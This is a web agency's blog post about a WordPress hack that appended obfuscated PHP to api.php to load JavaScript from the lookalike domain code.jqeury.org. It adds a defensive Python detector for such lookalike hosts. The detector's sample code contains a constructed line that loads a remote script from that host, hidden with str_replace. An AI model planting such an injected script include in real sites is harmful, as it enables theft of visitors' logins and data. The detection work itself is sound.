The Battle Against the Hacks…

Alex Centeno

Director of Digital at AndiSites Inc.
Alex is AndiSites' Director of Digital. He writes on all things digital, including web design, development, SEO, online marketing, photography, and video.

If you are at all involved in the web world, you will inevitably come in contact with WordPress: the beautifully designed, easy-to-use content management system that is our favorite here at AndiSites. According to W3Techs, WordPress is now estimated to be used by 58.9% of websites that run a content management system and by 25.7% of all websites.1

Since WordPress is the most popular CMS, hackers can target low-quality implementations (including weak installations and unsupported versions) in order to gain an edge. Hence the importance of making sure your WordPress website is developed and supported by skilled professionals, and that core security and plugin updates are made regularly. 

The most recent vulnerability we discovered

A new client of ours sought help from AndiSites because they were seeing errors and experiencing problems with their site.

The vulnerability that we discovered was likely installed via a Gravity Forms plugin that hadn’t been updated to the latest version. We have heard of past hackers gaining access through Gravity Forms, and thankfully the folks at Rocketgenius (the plugin’s provider) address those vulnerabilities the moment they find them. Gravity Forms is included in many websites since it is a powerful, highly customizable form builder plugin that not only collects information but also integrates with lots of third-party database services. Unfortunately, some websites do not keep up with the latest security updates and put themselves at potential risk of getting hacked.

The actual code

In the hack mentioned above, the implanted code was appended to the bottom of the api.php file. It consists mainly of a set of routines that enqueue an external JavaScript file so that it is included in the site's normal script calls. It is hard to detect because the domain serving the external script closely resembles the domains of legitimate libraries served from public CDNs. In this case the hacker chose a domain very similar to code.jquery.com: he registered jqeury.org and then created the subdomain code.jqeury.org, which is easy to miss when you only glance at the page source.

Most importantly, you can't simply search your installation for the domain name, because the injected code never writes it out literally. It builds the string at run time with PHP's string replace function (str_replace): in this case the code contained "j..q..e..u..r..y…o..r..g" as part of the string and then stripped the dots with string replace (as in the example below).

[Screenshot: the injected PHP code that assembles the domain with string replace]
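As an added example (not code from this post or from AndiSites), the following Python script shows one way to look for this kind of injection from the defender's side: it statically folds the str_replace() and string-concatenation tricks described above and then flags any script host that is a lookalike of a trusted CDN host. The PHP fragment and the trusted-host list are constructed assumptions, not the attacker's actual code.

```python
import re
# Hosts this site is known to load scripts from (assumption: tune per site).
TRUSTED_HOSTS = {"code.jquery.com", "ajax.googleapis.com", "cdnjs.cloudflare.com"}

# Constructed PHP fragment in the style the post describes; not the real injected code.
SAMPLE_PHP = """<?php
function site_assets() { wp_enqueue_script('jq', 'https://code.jquery.com/jquery-1.11.3.min.js'); }
add_action('wp_enqueue_scripts', 'site_assets');
/* appended at the bottom of the file: the dots hide the lookalike host from a plain grep */
function x1() { wp_enqueue_script('x1', 'https://code.' . str_replace('.', '', 'j..q..e..u..r..y') . '.org/x.js'); }
add_action('wp_enqueue_scripts', 'x1');
"""

STR_REPLACE = re.compile(r"""str_replace\(\s*(['"])(.*?)\1\s*,\s*(['"])(.*?)\3\s*,\s*(['"])(.*?)\5\s*\)""")
CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\.\s*(['"])([^'"]*)\3""")
URL = re.compile(r"https?://([A-Za-z0-9.-]+)")

def deobfuscate(php: str) -> str:
    """Fold str_replace() on literals and literal concatenation until nothing changes."""
    prev = None
    while prev != php:
        prev = php
        php = STR_REPLACE.sub(lambda m: "'" + m.group(6).replace(m.group(2), m.group(4)) + "'", php)
        php = CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", php)
    return php

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, classic row-by-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def brand(host: str) -> str:
    return host.split(".")[-2] if "." in host else host  # label left of the TLD, e.g. 'jqeury'

def suspicious_hosts(php: str) -> list:
    """Return (host, verdict) for every script host in php that is not on the trusted list."""
    findings = []
    for host in sorted(set(URL.findall(deobfuscate(php)))):
        if host in TRUSTED_HOSTS:
            continue
        nearest = min(TRUSTED_HOSTS, key=lambda t: edit_distance(brand(host), brand(t)))
        close = edit_distance(brand(host), brand(nearest)) <= 2
        findings.append((host, "lookalike of " + nearest if close else "untrusted external host"))
    return findings
```

Run `suspicious_hosts(open(path).read())` over each PHP file in the plugin and theme directories; a hit on a lookalike host is worth a manual look at the surrounding code.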

Why did the hacker do this on our client's site? It's impossible to know for sure, but, for example, enqueuing an external JavaScript file that steals a login cookie can be used maliciously for all sorts of things. On an e-commerce site it can be used to gain access to sensitive information, including digital download products, customer information, and much more.

The moral of the story

I don't want to beat a dead horse by reminding you yet again about the importance of a support plan with a reputable WordPress agency, but I want to encourage you to make the security of your website a priority. Security is a vital part of every website, and at AndiSites we build security into every website we do and provide support plans that give you peace of mind post-launch.


1. http://w3techs.com/technologies/details/cm-wordpress/all/all
